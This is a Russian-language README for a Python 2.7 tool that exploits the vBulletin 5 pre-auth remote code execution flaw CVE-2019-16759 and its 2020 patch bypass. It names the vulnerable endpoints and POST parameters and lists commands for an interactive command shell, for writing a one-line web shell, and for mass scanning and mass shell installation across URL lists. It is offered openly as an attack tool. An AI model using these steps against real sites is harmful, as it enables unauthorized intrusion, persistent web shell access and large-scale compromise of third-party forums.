
CVE-2019-16759 vbulletin 5.0.0 до 5.5.4 pre-auth RCE
В сентябре 2019 года в vbulletion5 (5.0.0-5.5.4) была обнаружена RCE-уязвимость (CVE-2019-16759). Используя файл ajax/render/widget_php и параметр POST widgetConfig[code], можно напрямую выполнить удалённый код.
11 августа 2020 года в сети появилась информация о том, что обход патча CVE-2019-16759 возможен через ajax/render/widget_tabbedcontainer_tab_panel и конструкцию POST-параметра subWidgets[0][config][code], что также позволяет напрямую выполнять удалённый код.
Данный инструмент поддерживает проверку одного URL, cmdshell, получение web shell (запись webshell-однострочника), массовую проверку и массовое получение shell.
python2.7
pip install requests
Справка: python vbulletin5-rce.py -h

Проверка одного URL на уязвимость: python vbulletin5-rce.py -u "http://www.xxx.com/"


cmdshell: python vbulletin5-rce.py -u "http://www.xxx.com/" --cmdshell


Получение shell по одному URL: python vbulletin5-rce.py -u "http://www.xxx.com/" --getshell


Массовая проверка: python vbulletin5-rce.py -f urls.txt

Массовое получение shell: python vbulletin5-rce.py -f urls.txt --getshell

gmail: [email protected]